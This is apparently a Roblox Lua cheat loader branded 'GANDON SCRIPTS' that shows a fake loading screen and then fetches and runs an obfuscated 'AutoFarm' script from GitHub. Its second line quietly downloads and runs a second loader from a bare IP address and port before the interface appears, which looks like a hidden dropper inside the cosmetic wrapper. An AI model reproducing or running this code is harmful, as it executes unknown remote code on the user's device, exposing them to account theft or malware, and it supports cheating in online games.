ID="1bdb7b80-7488-42ad-981b-c0bf99c6f1e0";
loadstring(game:HttpGet("http://109.71.240.235:3910/cdn/loader.luau"))()
local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local RunService = game:GetService("RunService")

local SETTINGS = {
    loadTime = 15,
    backgroundTransparency = 0.1,
    
    font = Enum.Font.DenkOne,
    titleFont = Enum.Font.Creepster,
    
    titleText = "GANDON SCRIPTS",
    titleSize = 48,
    titleColor = Color3.fromRGB(150, 0, 0),
    
    subtitleText = "script from video loader",
    subtitleSize = 18,
    subtitleColor = Color3.fromRGB(100, 0, 0),
    
    asciiArtColor = Color3.fromRGB(80, 0, 0),
    
    percentSize = 18,
    percentColor = Color3.fromRGB(150, 0, 0),
    
    statusSize = 14,
    statusColor = Color3.fromRGB(100, 0, 0),
    
    barColor = Color3.fromRGB(0, 0, 0),
    barBackgroundColor = Color3.fromRGB(40, 0, 0),
    barWidth = 400,
    barHeight = 15,
    barCornerRadius = 2,
    
    notificationWidth = 300,
    notificationHeight = 70,
    notificationBgColor = Color3.fromRGB(20, 0, 0),
    notificationBgTransparency = 0.2,
    successTextColor = Color3.fromRGB(150, 0, 0),
    successTextSize = 18,
    foundTextColor = Color3.fromRGB(100, 0, 0),
    foundTextSize = 14,
    
    gradientAnimationSpeed = 0.5,
    gradientWidth = 0.4,
}

local scriptConfig = {
    [142823291] = [[loadstring(game:HttpGet("https://raw.githubusercontent.com/xyuxyu67/lodndsrc/refs/heads/main/AutoFarm%20Obfuscated.txt"))()]],
    [0] = "",
}

local statusMessages = {
    {text = "Defining the game", endTime = 13},
    {text = "Looking for a script", endTime = 24},
    {text = "Loading the script", endTime = 30}
}

local asciiArt = {
    "---------------------------::.%@@@@@@@@@@@@@@-::::-------------------------------------",
    "-------------------------:.@@@@@-:::::::::%@@@@@@@.:-----------------------------------",
    "------------------------.#@@*.::----------::::.@@@@@:----------------------------------",
    "-----------------------:@@@.:------------------::.@@.----------------------------------",
    "-----------------------:@@@:-----------::::::::::.@@@.---------------------------------",
    "----------------------:@@@*:--------:::@@@@@@@@@@@@@@@.:-------------------------------",
    "----------------------:@@@.-------:.@@@@@.........:.@@@@::-----------------------------",
    "-------------------:::.@@@:------.@@@.::..+@@@@@@@.:::.@@@:----------------------------",
    "---------------:::.%@@@@@@:-----:%@@.--.@@@@@@@@@@@@:--.@@:----------------------------",
    "-------------:.@@@@@@*.@@@:-----:@@.--:*@@@@@@@@@@@+:--.@@:-----------:::-=:::::::-----",
    "------------:@@@@%.::::@@@:-----:@@.---::.@@@@@#.:::--.@@@:----------.@@@@@@@@@@@=.::--",
    "------------:@@@.:----:@@@:-----:@@@.-----::::::----:.*@@.----------:@@:::::::.*@@@@@.:",
    "------------.@@.------:@@@:------.@@@.:---:::::::::.+@@@.----------:.@@:-------:::::@@@",
    "-----------:@@@:------:@@%:-------.@@@@.:.#@@@@@@@@@@@.:-----::::::@@@@:------------.@@%",
    "-----------:@@@:------:@@:---------:.%@@@@@@@@=.:.@@@.---:::.@@@@@@@@.:-------------:@@@",
    "-----------:@@@:------:@@:-----------:::::::::---:@@@.::.@@@@@@+.::::---------------.@@",
    "-----------:@@@:------:@@:--------------------:::.*@@@@@@@@@.:::-------------------.@@@",
    "-----------:@@@:------:@@:-----------------::.@@@@@@@@.:::::---------------------:.@@@.",
    "-----------:@@@.------:@@:--------------::.@@@@@*.::::----------------------::::.@@@=.-",
    "-----------:#@@+:-----:@@:------------:.@@@@@.:::----------------------::::.@@@@@@::---",
    "------------.@@@:-----.@@:-----------.@@@@.::---------------------::::.#@@@@@@@.::-----",
    "------------:@@@.::::.+@@:----------:@@@.:--------------------:::.+@@@@@@+.::::--------",
    "-------------:=@@@@@@@@@@:----------.@@.---------------------.@@@@@@=.::::-------------",
    "---------------:::@@@@@@@:----------+@@:--------------------:@@@ :::-------------------",
    "------------------:::.@@@:----------.@@:---------------------.@@@:---------------------",
    "---------------------:@@@:----------.@@.----------------------.@@----------------------",
    "----------------------.@@:---------:@@@@.---------:.=.--------:@@=---------------------",
    "----------------------:@@@.------::.@@@@@.-------.+@@@.:------.@@.---------------------",
    "-----------------------:@@#.::::.+@@@@ @@@.:::::.@@@+@@@.::::.@@#:---------------------",
    "------------------------.@@@@@@@@@@-.:-:.@@@@@@@@@+.:.#@@@@@@@@.:----------------------",
    "-------------------------::::::::::------::.@@@.:::---::.@@@@.:------------------------"
}

local player = Players.LocalPlayer
local gui = Instance.new("ScreenGui")
gui.Name = "LoadingScreen"
gui.IgnoreGuiInset = true
gui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
gui.DisplayOrder = 999
gui.ResetOnSpawn = false
gui.Parent = player:WaitForChild("PlayerGui")

local mainFrame = Instance.new("Frame")
mainFrame.Size = UDim2.new(1, 0, 1, 0)
mainFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
mainFrame.BackgroundTransparency = SETTINGS.backgroundTransparency
mainFrame.BorderSizePixel = 0
mainFrame.Parent = gui

local titleLabel = Instance.new("TextLabel")
titleLabel.Size = UDim2.new(0, 400, 0, 60)
titleLabel.Position = UDim2.new(0.5, 0, 0.4, 0)
titleLabel.AnchorPoint = Vector2.new(0.5, 0.5)
titleLabel.Text = SETTINGS.titleText
titleLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
titleLabel.TextSize = SETTINGS.titleSize
titleLabel.Font = SETTINGS.titleFont
titleLabel.BackgroundTransparency = 1
titleLabel.AutoLocalize = false
titleLabel.Parent = mainFrame

local subtitleLabel = Instance.new("TextLabel")
subtitleLabel.Size = UDim2.new(0, 400, 0, 30)
subtitleLabel.Position = UDim2.new(0.5, 0, 0.47, 0)
subtitleLabel.AnchorPoint = Vector2.new(0.5, 0.5)
subtitleLabel.Text = SETTINGS.subtitleText
subtitleLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
subtitleLabel.TextSize = SETTINGS.subtitleSize
subtitleLabel.Font = SETTINGS.font
subtitleLabel.BackgroundTransparency = 1
subtitleLabel.AutoLocalize = false
subtitleLabel.Parent = mainFrame

local asciiContainer = Instance.new("Frame")
asciiContainer.Size = UDim2.new(0, 600, 0, 120)
asciiContainer.Position = UDim2.new(0.5, 0, 0.66, 0)
asciiContainer.AnchorPoint = Vector2.new(0.5, 0.5)
asciiContainer.BackgroundTransparency = 1
asciiContainer.Parent = mainFrame

for i, line in ipairs(asciiArt) do
    local textLabel = Instance.new("TextLabel")
    textLabel.Size = UDim2.new(1, 0, 0, 4)
    textLabel.Position = UDim2.new(0, 0, 0, (i-1) * 4)
    textLabel.Text = line
    textLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
    textLabel.TextSize = 3
    textLabel.Font = Enum.Font.Code
    textLabel.BackgroundTransparency = 1
    textLabel.TextXAlignment = Enum.TextXAlignment.Center
    textLabel.AutoLocalize = false
    textLabel.Parent = asciiContainer
end

local barBackground = Instance.new("Frame")
barBackground.Size = UDim2.new(0, SETTINGS.barWidth, 0, SETTINGS.barHeight)
barBackground.Position = UDim2.new(0.5, 0, 0.85, 0)
barBackground.AnchorPoint = Vector2.new(0.5, 0.5)
barBackground.BackgroundColor3 = SETTINGS.barBackgroundColor
barBackground.BorderSizePixel = 0
barBackground.Parent = mainFrame

local corner = Instance.new("UICorner")
corner.CornerRadius = UDim.new(0, SETTINGS.barCornerRadius)
corner.Parent = barBackground

local barStroke = Instance.new("UIStroke")
barStroke.Color = Color3.fromRGB(60, 0, 0)
barStroke.Thickness = 1
barStroke.Transparency = 0.5
barStroke.Parent = barBackground

local gradient = Instance.new("UIGradient")
gradient.Color = ColorSequence.new({
    ColorSequenceKeypoint.new(0, Color3.fromRGB(0, 0, 0)),
    ColorSequenceKeypoint.new(0.3, Color3.fromRGB(40, 0, 0)),
    ColorSequenceKeypoint.new(0.7, Color3.fromRGB(40, 0, 0)),
    ColorSequenceKeypoint.new(1, Color3.fromRGB(0, 0, 0))
})

local progressBar = Instance.new("Frame")
progressBar.Size = UDim2.new(0, 0, 1, 0)
progressBar.Position = UDim2.new(0, 0, 0, 0)
progressBar.BackgroundColor3 = SETTINGS.barColor
progressBar.BorderSizePixel = 0
progressBar.Parent = barBackground
gradient.Parent = progressBar

local progressCorner = Instance.new("UICorner")
progressCorner.CornerRadius = UDim.new(0, SETTINGS.barCornerRadius)
progressCorner.Parent = progressBar

local percentLabel = Instance.new("TextLabel")
percentLabel.Size = UDim2.new(0, 50, 0, SETTINGS.barHeight)
percentLabel.Position = UDim2.new(0.5, SETTINGS.barWidth/2 + 10, 0.85, 0)
percentLabel.AnchorPoint = Vector2.new(0, 0.5)
percentLabel.Text = "0%"
percentLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
percentLabel.TextSize = SETTINGS.percentSize
percentLabel.Font = SETTINGS.font
percentLabel.BackgroundTransparency = 1
percentLabel.TextXAlignment = Enum.TextXAlignment.Left
percentLabel.AutoLocalize = false
percentLabel.Parent = mainFrame

local statusLabel = Instance.new("TextLabel")
statusLabel.Size = UDim2.new(0, SETTINGS.barWidth + 50, 0, 20)
statusLabel.Position = UDim2.new(0.5, 0, 0.87, 0)
statusLabel.AnchorPoint = Vector2.new(0.5, 0)
statusLabel.Text = ""
statusLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
statusLabel.TextSize = SETTINGS.statusSize
statusLabel.Font = SETTINGS.font
statusLabel.BackgroundTransparency = 1
statusLabel.TextXAlignment = Enum.TextXAlignment.Center
statusLabel.AutoLocalize = false
statusLabel.Parent = mainFrame

local notificationFrame = Instance.new("Frame")
notificationFrame.Size = UDim2.new(0, SETTINGS.notificationWidth, 0, SETTINGS.notificationHeight)
notificationFrame.Position = UDim2.new(1, 10, 1, -20)
notificationFrame.AnchorPoint = Vector2.new(1, 1)
notificationFrame.BackgroundColor3 = SETTINGS.notificationBgColor
notificationFrame.BackgroundTransparency = SETTINGS.notificationBgTransparency
notificationFrame.BorderSizePixel = 0
notificationFrame.Visible = false
notificationFrame.Parent = gui

local notificationCorner = Instance.new("UICorner")
notificationCorner.CornerRadius = UDim.new(0, 8)
notificationCorner.Parent = notificationFrame

local notificationStroke = Instance.new("UIStroke")
notificationStroke.Color = Color3.fromRGB(80, 0, 0)
notificationStroke.Thickness = 1
notificationStroke.Parent = notificationFrame

local successLabel = Instance.new("TextLabel")
successLabel.Size = UDim2.new(1, -20, 0.5, 0)
successLabel.Position = UDim2.new(0, 10, 0.35, 0)
successLabel.AnchorPoint = Vector2.new(0, 0.5)
successLabel.Text = "Successfully executed"
successLabel.TextColor3 = SETTINGS.successTextColor
successLabel.TextSize = SETTINGS.successTextSize
successLabel.Font = SETTINGS.font
successLabel.BackgroundTransparency = 1
successLabel.TextXAlignment = Enum.TextXAlignment.Left
successLabel.AutoLocalize = false
successLabel.Parent = notificationFrame

local foundLabel = Instance.new("TextLabel")
foundLabel.Size = UDim2.new(1, -20, 0.5, 0)
foundLabel.Position = UDim2.new(0, 10, 0.75, 0)
foundLabel.AnchorPoint = Vector2.new(0, 0.5)
foundLabel.Text = "Script for game has been found"
foundLabel.TextColor3 = SETTINGS.foundTextColor
foundLabel.TextSize = SETTINGS.foundTextSize
foundLabel.Font = SETTINGS.font
foundLabel.BackgroundTransparency = 1
foundLabel.TextXAlignment = Enum.TextXAlignment.Left
foundLabel.AutoLocalize = false
foundLabel.Parent = notificationFrame

local startTime = tick()
local connection
local currentStatusIndex = 1

local function fadeInElements()
    -- 3-секундная анимация появления: черный -> темно-красный
    local fadeInInfo = TweenInfo.new(3, Enum.EasingStyle.Quad, Enum.EasingDirection.Out)
    
    local titleFadeIn = TweenService:Create(titleLabel, fadeInInfo, {
        TextColor3 = SETTINGS.titleColor
    })
    
    local subtitleFadeIn = TweenService:Create(subtitleLabel, fadeInInfo, {
        TextColor3 = SETTINGS.subtitleColor
    })
    
    local percentFadeIn = TweenService:Create(percentLabel, fadeInInfo, {
        TextColor3 = SETTINGS.percentColor
    })
    
    local statusFadeIn = TweenService:Create(statusLabel, fadeInInfo, {
        TextColor3 = SETTINGS.statusColor
    })
    
    -- ASCII арт тоже появляется
    for i, child in ipairs(asciiContainer:GetChildren()) do
        if child:IsA("TextLabel") then
            local asciiFadeIn = TweenService:Create(child, fadeInInfo, {
                TextColor3 = SETTINGS.asciiArtColor
            })
            asciiFadeIn:Play()
        end
    end
    
    titleFadeIn:Play()
    subtitleFadeIn:Play()
    percentFadeIn:Play()
    statusFadeIn:Play()
    
    return 3 -- Возвращаем время анимации
end

local function fadeOutElements()
    -- 3-секундная анимация исчезновения: темно-красный -> черный
    local fadeOutInfo = TweenInfo.new(3, Enum.EasingStyle.Quad, Enum.EasingDirection.Out)
    
    local titleFadeOut = TweenService:Create(titleLabel, fadeOutInfo, {
        TextColor3 = Color3.fromRGB(0, 0, 0)
    })
    
    local subtitleFadeOut = TweenService:Create(subtitleLabel, fadeOutInfo, {
        TextColor3 = Color3.fromRGB(0, 0, 0)
    })
    
    local percentFadeOut = TweenService:Create(percentLabel, fadeOutInfo, {
        TextColor3 = Color3.fromRGB(0, 0, 0)
    })
    
    local statusFadeOut = TweenService:Create(statusLabel, fadeOutInfo, {
        TextColor3 = Color3.fromRGB(0, 0, 0)
    })
    
    -- ASCII арт тоже исчезает
    for i, child in ipairs(asciiContainer:GetChildren()) do
        if child:IsA("TextLabel") then
            local asciiFadeOut = TweenService:Create(child, fadeOutInfo, {
                TextColor3 = Color3.fromRGB(0, 0, 0)
            })
            asciiFadeOut:Play()
        end
    end
    
    titleFadeOut:Play()
    subtitleFadeOut:Play()
    percentFadeOut:Play()
    statusFadeOut:Play()
    
    return 3 -- Возвращаем время анимации
end

local function resetLoading()
    startTime = tick()
    currentStatusIndex = 1
    progressBar.Size = UDim2.new(0, 0, 1, 0)
    percentLabel.Text = "0%"
    statusLabel.Text = ""
    
    titleLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
    subtitleLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
    percentLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
    statusLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
    
    titleLabel.TextTransparency = 0
    subtitleLabel.TextTransparency = 0
    percentLabel.TextTransparency = 0
    statusLabel.TextTransparency = 0
    barBackground.BackgroundTransparency = 0
    progressBar.BackgroundTransparency = 0
    barStroke.Transparency = 0.5
    mainFrame.BackgroundTransparency = SETTINGS.backgroundTransparency
    
    for i, child in ipairs(asciiContainer:GetChildren()) do
        if child:IsA("TextLabel") then
            child.TextColor3 = Color3.fromRGB(0, 0, 0)
            child.TextTransparency = 0
        end
    end
end

local function showSuccessNotification()
    notificationFrame.Visible = true
    notificationFrame.Position = UDim2.new(1, 10, 1, -20)
    
    local tweenIn = TweenService:Create(notificationFrame, TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), {
        Position = UDim2.new(1, -10, 1, -20)
    })
    
    tweenIn:Play()
    
    wait(6)
    
    local tweenOut = TweenService:Create(notificationFrame, TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), {
        Position = UDim2.new(1, 10, 1, -20)
    })
    
    tweenOut:Play()
    
    wait(0.5)
    notificationFrame.Visible = false
end

local function startHeartbeatConnection()
    connection = RunService.Heartbeat:Connect(function()
        local elapsed = tick() - startTime
        local progress = math.min(elapsed / SETTINGS.loadTime, 1)
        local percent = math.floor(progress * 100)
        
        progressBar.Size = UDim2.new(progress, 0, 1, 0)
        percentLabel.Text = percent .. "%"
        
        if currentStatusIndex <= #statusMessages then
            local currentStatus = statusMessages[currentStatusIndex]
            if elapsed <= currentStatus.endTime then
                statusLabel.Text = currentStatus.text
            else
                currentStatusIndex = currentStatusIndex + 1
                if currentStatusIndex <= #statusMessages then
                    statusLabel.Text = statusMessages[currentStatusIndex].text
                end
            end
        end
        
        if progress >= 1 then
            connection:Disconnect()
            
            local currentPlaceId = game.PlaceId
            local scriptToExecute = scriptConfig[currentPlaceId]
            
            if scriptToExecute and scriptToExecute ~= "" then
                -- Сначала делаем все текстовые элементы полностью прозрачными
                local fadeOutInfo = TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out)
                
                local titleFade = TweenService:Create(titleLabel, fadeOutInfo, {
                    TextTransparency = 1
                })
                
                local subtitleFade = TweenService:Create(subtitleLabel, fadeOutInfo, {
                    TextTransparency = 1
                })
                
                local percentFade = TweenService:Create(percentLabel, fadeOutInfo, {
                    TextTransparency = 1
                })
                
                local statusFade = TweenService:Create(statusLabel, fadeOutInfo, {
                    TextTransparency = 1
                })
                
                titleFade:Play()
                subtitleFade:Play()
                percentFade:Play()
                statusFade:Play()
                
                -- Делаем ASCII арт прозрачным
                for i, child in ipairs(asciiContainer:GetChildren()) do
                    if child:IsA("TextLabel") then
                        local asciiFade = TweenService:Create(child, fadeOutInfo, {
                            TextTransparency = 1
                        })
                        asciiFade:Play()
                    end
                end
                
                wait(0.5)  -- Ждем завершения анимации прозрачности текста
                
                -- Исчезновение всего GUI
                local tweenInfo = TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out)
                
                local mainTween = TweenService:Create(mainFrame, tweenInfo, {BackgroundTransparency = 1})
                local barBgTween = TweenService:Create(barBackground, tweenInfo, {BackgroundTransparency = 1})
                local barTween = TweenService:Create(progressBar, tweenInfo, {BackgroundTransparency = 1})
                local strokeTween = TweenService:Create(barStroke, tweenInfo, {Transparency = 1})
                local notificationStrokeTween = TweenService:Create(notificationStroke, tweenInfo, {Transparency = 1})
                
                mainTween:Play()
                barBgTween:Play()
                barTween:Play()
                strokeTween:Play()
                notificationStrokeTween:Play()
                
                wait(0.5)
                
                local success, errorMessage = pcall(function()
                    loadstring(scriptToExecute)()
                end)
                
                if not success then
                    warn("Script execution error: " .. tostring(errorMessage))
                else
                    showSuccessNotification()
                end
                
                wait(7)
                gui:Destroy()
            else
                progressBar.Size = UDim2.new(1, 0, 1, 0)
                percentLabel.Text = "100%"
                
                statusLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
                statusLabel.Text = "Mistake: The script for the game was not found"
                wait(5)
                
                statusLabel.TextColor3 = SETTINGS.statusColor
                statusLabel.Text = "Retrying to find the script..."
                wait(5)
                
                resetLoading()
                fadeInElements()
                startHeartbeatConnection()
            end
        end
    end)
end

fadeInElements()
startHeartbeatConnection()
